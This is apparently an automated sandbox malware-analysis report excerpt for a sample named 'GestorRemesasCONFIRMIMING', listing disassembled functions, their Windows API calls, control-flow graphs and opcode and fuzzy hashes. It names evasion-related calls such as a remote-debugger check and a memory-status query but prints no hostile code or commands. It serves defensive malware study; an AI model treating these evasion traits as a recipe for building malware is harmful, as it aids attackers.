                                                  • Opcode Fuzzy Hash: 94f57575df17fc234ad03acfadb404bd0d9797b3dcd7541db6f01436fae946f3
                                                  • Instruction Fuzzy Hash: D85189B090034ACFEB54DFA9D948B9EBBF1FF88314F208059E509A7351DB745944CBA5
                                                  Function 068F3CE0 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  • GetCurrentProcess.KERNEL32 ref: 068F3D5E
                                                  • GetCurrentThread.KERNEL32 ref: 068F3D9B
                                                  • GetCurrentProcess.KERNEL32 ref: 068F3DD8
                                                  • GetCurrentThreadId.KERNEL32 ref: 068F3E31
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551352397.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_68f0000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID: Current$ProcessThread
                                                  • String ID:
                                                  • API String ID: 2063062207-0
                                                  • Opcode ID: 17b7f68d5d1b811d856fb64224787509fa18b5f05eec97b06f31bd209a67f5bb
                                                  • Instruction ID: 4d3f185a60a93d2970b1ca79a66fb766a354d45e60bce62b3e90283316d03a55
                                                  • Opcode Fuzzy Hash: 17b7f68d5d1b811d856fb64224787509fa18b5f05eec97b06f31bd209a67f5bb
                                                  • Instruction Fuzzy Hash: E05157B0900349CFEB54DFA9D948B9EBBF1FF88314F208059E609A73A1DB745944CBA5
                                                  Function 068FC370 Relevance: 1.7, APIs: 1, Instructions: 203COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 653 68fc370-68fc38f 655 68fc3bb-68fc3bf 653->655 656 68fc391-68fc39e call 68fb744 653->656 658 68fc3d3-68fc414 655->658 659 68fc3c1-68fc3cb 655->659 661 68fc3b4 656->661 662 68fc3a0 656->662 665 68fc416-68fc41e 658->665 666 68fc421-68fc42f 658->666 659->658 661->655 710 68fc3a6 call 68fc60a 662->710 711 68fc3a6 call 68fc618 662->711 665->666 667 68fc453-68fc455 666->667 668 68fc431-68fc436 666->668 673 68fc458-68fc45f 667->673 670 68fc438-68fc43f call 68fb750 668->670 671 68fc441 668->671 669 68fc3ac-68fc3ae 669->661 672 68fc4f0-68fc5b0 669->672 675 68fc443-68fc451 670->675 671->675 705 68fc5b8-68fc5e3 GetModuleHandleW 672->705 706 68fc5b2-68fc5b5 672->706 676 68fc46c-68fc473 673->676 677 68fc461-68fc469 673->677 675->673 679 68fc475-68fc47d 676->679 680 68fc480-68fc489 call 68f48f4 676->680 677->676 679->680 685 68fc48b-68fc493 680->685 686 68fc496-68fc49b 680->686 685->686 687 68fc49d-68fc4a4 686->687 688 68fc4b9-68fc4c6 686->688 687->688 690 68fc4a6-68fc4b6 call 68f9d60 call 68fb760 687->690 695 68fc4e9-68fc4ef 688->695 696 68fc4c8-68fc4e6 688->696 690->688 696->695 707 68fc5ec-68fc600 705->707 708 68fc5e5-68fc5eb 705->708 706->705 708->707 710->669 711->669
                                                  APIs
                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 068FC5D6
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551352397.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_68f0000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID:
                                                  • API String ID: 4139908857-0
                                                  • Opcode ID: f49280ac885f12964d1d7c730d9ebfff62bf5299db7c8374362b34b6945a4e0c
                                                  • Instruction ID: 72f45608266559cd00649049dc98f8800a4384e70aa79f7b21487cf68fbe55ee
                                                  • Opcode Fuzzy Hash: f49280ac885f12964d1d7c730d9ebfff62bf5299db7c8374362b34b6945a4e0c
                                                  • Instruction Fuzzy Hash: 14812370A10B098FD7A4DF2AD44076BBBF1BB88204F10892ED696D7A40DB75E945CB91
                                                  Function 068FE544 Relevance: 1.6, APIs: 1, Instructions: 120COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 712 68fe544-68fe5b6 714 68fe5b8-68fe5be 712->714 715 68fe5c1-68fe5c8 712->715 714->715 716 68fe5ca-68fe5d0 715->716 717 68fe5d3-68fe60b 715->717 716->717 718 68fe613-68fe672 CreateWindowExW 717->718 719 68fe67b-68fe6b3 718->719 720 68fe674-68fe67a 718->720 724 68fe6b5-68fe6b8 719->724 725 68fe6c0 719->725 720->719 724->725 726 68fe6c1 725->726 726->726
                                                  APIs
                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 068FE662
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551352397.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_68f0000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID: CreateWindow
                                                  • String ID:
                                                  • API String ID: 716092398-0
                                                  • Opcode ID: 301b89e78ea655c3ea183eabfb5edae5049d1936afeb2a7fa036bc0db20e90eb
                                                  • Instruction ID: 9511cb299cdcd71447ddd5b4e764bda84eaa9ebedf526c021da168e8c12d0352
                                                  • Opcode Fuzzy Hash: 301b89e78ea655c3ea183eabfb5edae5049d1936afeb2a7fa036bc0db20e90eb
                                                  • Instruction Fuzzy Hash: 5B51CEB5D10349EFDB14CFA9C884ADEBFB5BF48310F24812AEA19AB210D7759845CF91
                                                  Function 068FE550 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 727 68fe550-68fe5b6 728 68fe5b8-68fe5be 727->728 729 68fe5c1-68fe5c8 727->729 728->729 730 68fe5ca-68fe5d0 729->730 731 68fe5d3-68fe672 CreateWindowExW 729->731 730->731 733 68fe67b-68fe6b3 731->733 734 68fe674-68fe67a 731->734 738 68fe6b5-68fe6b8 733->738 739 68fe6c0 733->739 734->733 738->739 740 68fe6c1 739->740 740->740
                                                  APIs
                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 068FE662
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551352397.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_68f0000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID: CreateWindow
                                                  • String ID:
                                                  • API String ID: 716092398-0
                                                  • Opcode ID: a8b1d3ca3acd81dd33c1a7a8bc97af791cc8cadf56495343e78e5d7bb4213931
                                                  • Instruction ID: ed746f4026f19feeb4e94402ba3aa9d0b49b4e2e77a3bebac4e59e44e24e0ad1
                                                  • Opcode Fuzzy Hash: a8b1d3ca3acd81dd33c1a7a8bc97af791cc8cadf56495343e78e5d7bb4213931
                                                  • Instruction Fuzzy Hash: E841B0B1D10349EFDF14CF99C984ADEBBB5BF48310F24812AEA19AB210D7759945CF90
                                                  Function 0294F2D4 Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 741 294f2d4-294f2f1 744 294f2f7-294f384 GlobalMemoryStatusEx 741->744 745 294f2f3-294f2f6 741->745 748 294f386-294f38c 744->748 749 294f38d-294f3b5 744->749 748->749
                                                  APIs
                                                  • GlobalMemoryStatusEx.KERNELBASE ref: 0294F377
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4537442491.0000000002940000.00000040.00000800.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_2940000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID: GlobalMemoryStatus
                                                  • String ID:
                                                  • API String ID: 1890195054-0
                                                  • Opcode ID: 1789ce10943198b683a329032e7bf98d91ae2f7b95cb552769725ee700f0dd7e
                                                  • Instruction ID: 2c67fdbba75c5c893e1101f87fefd99f5ae7da13870d8cf2ab93eed36fa60207
                                                  • Opcode Fuzzy Hash: 1789ce10943198b683a329032e7bf98d91ae2f7b95cb552769725ee700f0dd7e
                                                  • Instruction Fuzzy Hash: 8B219A71C0429A9FDB10CFA9D444BDEFBF4AF48310F20856AE954A7340D7789940CFA1
                                                  Function 02947EB8 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 752 2947eb8-2947f44 CheckRemoteDebuggerPresent 754 2947f46-2947f4c 752->754 755 2947f4d-2947f88 752->755 754->755
                                                  APIs
                                                  • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 02947F37
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4537442491.0000000002940000.00000040.00000800.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_2940000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID: CheckDebuggerPresentRemote
                                                  • String ID:
                                                  • API String ID: 3662101638-0
                                                  • Opcode ID: 71a4b31e55a676b255d68fe55cba9d5586d3e0d0d0392dac0ad87189b3bf3a19
                                                  • Instruction ID: f9b4dab296b65285fa1ab033b277bb0e5c2a1dc27e1f9b38e029beea73bbf416
                                                  • Opcode Fuzzy Hash: 71a4b31e55a676b255d68fe55cba9d5586d3e0d0d0392dac0ad87189b3bf3a19
                                                  • Instruction Fuzzy Hash: C5214AB1800259CFDB10CF9AD485BEEFBF4AF49320F14846AE455A3740D7789944CF61
                                                  Function 068F3F20 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 764 68f3f20-68f3f27 765 68f3f28-68f3fbc DuplicateHandle 764->765 766 68f3fbe-68f3fc4 765->766 767 68f3fc5-68f3fe2 765->767 766->767
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 068F3FAF
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551352397.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_68f0000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: 5097908b54e8c247427c31efc3b01cff8aac80c97c75e5e81ea84a77869a5212
                                                  • Instruction ID: 70812fc1cb6e5d87395075277f125d5286476c63d439720c59c14ca30cf5664d
                                                  • Opcode Fuzzy Hash: 5097908b54e8c247427c31efc3b01cff8aac80c97c75e5e81ea84a77869a5212
                                                  • Instruction Fuzzy Hash: AF21D4B5D00209AFDB10CF9AD984ADEBBF8EB48310F14801AE918A3350D378A954CFA5
                                                  Function 068F3F28 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 770 68f3f28-68f3fbc DuplicateHandle 771 68f3fbe-68f3fc4 770->771 772 68f3fc5-68f3fe2 770->772 771->772
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 068F3FAF
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551352397.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_68f0000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: 85e61144d447582ce0771b623497a5757f98382c295799a58080248699ced184
                                                  • Instruction ID: 906e41c58661d548747a0026693fc4938a975f1e8f3f24f2a6b3ed66692c52cd
                                                  • Opcode Fuzzy Hash: 85e61144d447582ce0771b623497a5757f98382c295799a58080248699ced184
                                                  • Instruction Fuzzy Hash: A321B3B59002499FDB50CF9AD984ADEBBF4FB48320F14841AE958A3350D378A954CFA5
                                                  Function 068FC7D2 Relevance: 1.6, APIs: 1, Instructions: 57libraryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 775 68fc7d2-68fc818 777 68fc81a-68fc81d 775->777 778 68fc820-68fc84f LoadLibraryExW 775->778 777->778 779 68fc858-68fc875 778->779 780 68fc851-68fc857 778->780 780->779
                                                  APIs
                                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,068FC651,00000800,00000000,00000000), ref: 068FC842
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551352397.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_68f0000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  • Opcode ID: bf8c2c2ccf82f2299b629a505a969b858b8f6f73a01f01ba8f8af117ac7120fe
                                                  • Instruction ID: ee29dd253508aa583731ae62044b82bfe02425902cb4c892ba2cf358b4677097
                                                  • Opcode Fuzzy Hash: bf8c2c2ccf82f2299b629a505a969b858b8f6f73a01f01ba8f8af117ac7120fe
                                                  • Instruction Fuzzy Hash: 051117B6C003499FDB10CF9AD844ADFFBF4AB48320F10842AE555A7200C775A544CFA5
                                                  Function 068FB788 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 783 68fb788-68fc818 785 68fc81a-68fc81d 783->785 786 68fc820-68fc84f LoadLibraryExW 783->786 785->786 787 68fc858-68fc875 786->787 788 68fc851-68fc857 786->788 788->787
                                                  APIs
                                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,068FC651,00000800,00000000,00000000), ref: 068FC842
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551352397.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_68f0000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  • Opcode ID: 171786f0c53d76af0bdd5c380d4fa6e8a8136ac1b00b019f0206a68162670567
                                                  • Instruction ID: 9d6de6c24de241f232cecafaaf3c680bf91dad2432adbac44475bf1db9992e3d
                                                  • Opcode Fuzzy Hash: 171786f0c53d76af0bdd5c380d4fa6e8a8136ac1b00b019f0206a68162670567
                                                  • Instruction Fuzzy Hash: F21106B6C102498FDB10CF9AC444A9FFBF4EB48310F10842AE615A7600C775A544CFA5
                                                  Function 0294F310 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 791 294f310-294f384 GlobalMemoryStatusEx 793 294f386-294f38c 791->793 794 294f38d-294f3b5 791->794 793->794
                                                  APIs
                                                  • GlobalMemoryStatusEx.KERNELBASE ref: 0294F377
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4537442491.0000000002940000.00000040.00000800.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_2940000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID: GlobalMemoryStatus
                                                  • String ID:
                                                  • API String ID: 1890195054-0
                                                  • Opcode ID: c781d0d77e6db4339da09bc94db125b1624d1162d0b7eacf718ce519c941438c
                                                  • Instruction ID: 4f387fa6a10fe6c51f68678bb282fda83f84995d5afb8dffaffd08fbbd2c7843
                                                  • Opcode Fuzzy Hash: c781d0d77e6db4339da09bc94db125b1624d1162d0b7eacf718ce519c941438c
                                                  • Instruction Fuzzy Hash: EF1123B1C0065A9FCB10CF9AC544BDEFBF4BF48324F10826AD918A7240D778A954CFA1
                                                  Function 068FC570 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 068FC5D6
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551352397.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_68f0000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID:
                                                  • API String ID: 4139908857-0
                                                  • Opcode ID: 24fa6267a6bff52afc9ce7b415c9dac4a48ab5181cfc241798cfde33a73d6f7d
                                                  • Instruction ID: 3028f0f5ca714fbb6016bdb8dcea444b5180dcb0c0c149a49d1fa8714ada8c17
                                                  • Opcode Fuzzy Hash: 24fa6267a6bff52afc9ce7b415c9dac4a48ab5181cfc241798cfde33a73d6f7d
                                                  • Instruction Fuzzy Hash: 8B11DFB6C007498FDB10DF9AC444A9EFBF4BB88324F10846AD569A7210D379A649CFA1
                                                  Function 0691FE41 Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: |
                                                  • API String ID: 0-2343686810
                                                  • Opcode ID: f3b2c6fe55a56fe38f12dce99561c7c9244a6ee76873da08d014dd5b84e8eef3
                                                  • Instruction ID: 8b2634f812c284048d70f91d5fef5c9d3411bb5889a5169e17f1142edced03d7
                                                  • Opcode Fuzzy Hash: f3b2c6fe55a56fe38f12dce99561c7c9244a6ee76873da08d014dd5b84e8eef3
                                                  • Instruction Fuzzy Hash: BD216D75B002199FDB54DF78D804BADBBF2AF8C700F148469EA4AEB391DB359901CB90
                                                  Function 0691FE50 Relevance: 1.3, Strings: 1, Instructions: 59COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: |
                                                  • API String ID: 0-2343686810
                                                  • Opcode ID: a7f31ce9c6f850f01fba3762a4bd590d62b58dc455e660223a4673ccb540f08e
                                                  • Instruction ID: 87542a253f62575e5f7ee79a69d4b7b8d07cad3da6abcfde8add6462744f1e8f
                                                  • Opcode Fuzzy Hash: a7f31ce9c6f850f01fba3762a4bd590d62b58dc455e660223a4673ccb540f08e
                                                  • Instruction Fuzzy Hash: 63112E74B002199FDB54DF78D804B6E77F5AF48700F144469E60ADB791DB35AD01CB80
                                                  Function 0691CEB8 Relevance: .8, Instructions: 802COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 92e9b5327f6d55d1d935656802a4d11355eeb2cc6c1f961e41024a89f33b4e26
                                                  • Instruction ID: b10d252ccc2d3c7e3b003a0db10047c5ec711e5eb633234c978cfd1993766c24
                                                  • Opcode Fuzzy Hash: 92e9b5327f6d55d1d935656802a4d11355eeb2cc6c1f961e41024a89f33b4e26
                                                  • Instruction Fuzzy Hash: F8626B30A1120ACFDB15EB68D590A5EB7B2FF84304F209A6DD0059F759DB79EC4ACB80
                                                  Function 0691AC38 Relevance: .4, Instructions: 389COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bc944894e7fde0bffd407b4a6c91f6f4174d152d7e635a56650f5d25b7a67d9d
                                                  • Instruction ID: b5a31d4e9f86876023036568a1af49efe24913a12fa8aac99e4dfb6d4b5bd43e
                                                  • Opcode Fuzzy Hash: bc944894e7fde0bffd407b4a6c91f6f4174d152d7e635a56650f5d25b7a67d9d
                                                  • Instruction Fuzzy Hash: 1CE16F30F1120A8FDB69DB68D9806AEB7B6FF85304F30852AD505AB745DF749D42CB81
                                                  Function 06916161 Relevance: .3, Instructions: 312COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fc82946acbf166bfd5ca0eb7df9cadc6dde7f9c01f4e80fc6784944b9fc1ab20
                                                  • Instruction ID: f705fde450bea209ed3224052cb5574a8093fe3bd3b00745d699fc2fe1cbfec3
                                                  • Opcode Fuzzy Hash: fc82946acbf166bfd5ca0eb7df9cadc6dde7f9c01f4e80fc6784944b9fc1ab20
                                                  • Instruction Fuzzy Hash: C9C16034E001098FDB54DBA8D594AADB7B6FF88300F348569E906EB795DB34ED42CB90
                                                  Function 06918598 Relevance: .3, Instructions: 262COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0b7e41593952d4399b1d9276c82a41a1f6bb9968111e9de11d72e4a79512ec1a
                                                  • Instruction ID: 4089bba2dca99c48602d98d12cc974841c51892b86f2dfca81b0c66225eed22e
                                                  • Opcode Fuzzy Hash: 0b7e41593952d4399b1d9276c82a41a1f6bb9968111e9de11d72e4a79512ec1a
                                                  • Instruction Fuzzy Hash: 5FA15A30B0125A8FDB54EB74D99076EB7B2EF89300F2046A9D909AB345DF319D82DB81
                                                  Function 06918CC0 Relevance: .2, Instructions: 230COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: db9f7b2212bcb211a11e92dd2fdf0162d7d5d3878b9d338e845788d32a1c57fb
                                                  • Instruction ID: 3330a05be9964858c16d316e865650afe282c448cc6f320f03e1107a12e490bd
                                                  • Opcode Fuzzy Hash: db9f7b2212bcb211a11e92dd2fdf0162d7d5d3878b9d338e845788d32a1c57fb
                                                  • Instruction Fuzzy Hash: 33918F30B0024A8FDB64EB64D951BAE73F6BFC5200F208569D80AEB749EF70DD419B91
                                                  Function 06915D68 Relevance: .2, Instructions: 229COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5e80621b2721c6efa36df48af9eb5aa48a76fab83112dcd414767bd5096edf11
                                                  • Instruction ID: 598820cf0e5f5ea088c9c8e1f8330da50d89ce6c18f2c2a33aae79f5bd25229a
                                                  • Opcode Fuzzy Hash: 5e80621b2721c6efa36df48af9eb5aa48a76fab83112dcd414767bd5096edf11
                                                  • Instruction Fuzzy Hash: 9D61E6B1F001614BDF54AA7DC84466FBADBEFC4210B26447AE80EDB364DE65ED0287C1
                                                  Function 06913E58 Relevance: .2, Instructions: 225COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ebab9bd889b13713dcedd1425da012694e03fe967f5820948b99f7dfe15483da
                                                  • Instruction ID: ac2c7385923fab0b1b8515f1a07423ec17d98b5d9581ffb83553f2b33fa68f48
                                                  • Opcode Fuzzy Hash: ebab9bd889b13713dcedd1425da012694e03fe967f5820948b99f7dfe15483da
                                                  • Instruction Fuzzy Hash: 58816D30B1124A8FDB54DBA9D8547AEB7F7AF89300F208529D40AEF745EB34DC468B91
                                                  Function 06914178 Relevance: .2, Instructions: 219COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 23f35120db38c0679b84216397bfe110ab61adb22031e450943b748cdb695c43
                                                  • Instruction ID: a8b1de6a8678910262e4e86ff2d4a44ede5cd12a1104f7859ebbeb1bc6661d0b
                                                  • Opcode Fuzzy Hash: 23f35120db38c0679b84216397bfe110ab61adb22031e450943b748cdb695c43
                                                  • Instruction Fuzzy Hash: 0B913D30E102598FDF60DF64C890B9DB7B1FF89310F20859AD549EB295DB70AA86CF51
                                                  Function 06914190 Relevance: .2, Instructions: 210COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d7b49a60606882eb2af8c98cd69b40e877f0d025b8f6e0c7ac7e164b6833c5dd
                                                  • Instruction ID: 95d05e08bb3ec45ffc1fa33dff8bf5f70e648f67a1504d84d361e3c1286ea226
                                                  • Opcode Fuzzy Hash: d7b49a60606882eb2af8c98cd69b40e877f0d025b8f6e0c7ac7e164b6833c5dd
                                                  • Instruction Fuzzy Hash: 81911D30E106198BDF60DF68C890B9DB7B1FF89310F208599D549BB385DB70AA86CF91
                                                  Function 0691EA78 Relevance: .2, Instructions: 205COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c7900fcf1bdcf950df36d6fed802d25229f82834f7a69dcf5b5832f7929b68c0
                                                  • Instruction ID: 15737e55978a6db3343ff98c3de5c586f725d85a8444c6600debc20ae70f7503
                                                  • Opcode Fuzzy Hash: c7900fcf1bdcf950df36d6fed802d25229f82834f7a69dcf5b5832f7929b68c0
                                                  • Instruction Fuzzy Hash: 23714830E002498FDB55DBA9C990AAEBBF6FF88300F248529E405EB755DB34ED46CB50
                                                  Function 0691EA88 Relevance: .2, Instructions: 201COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
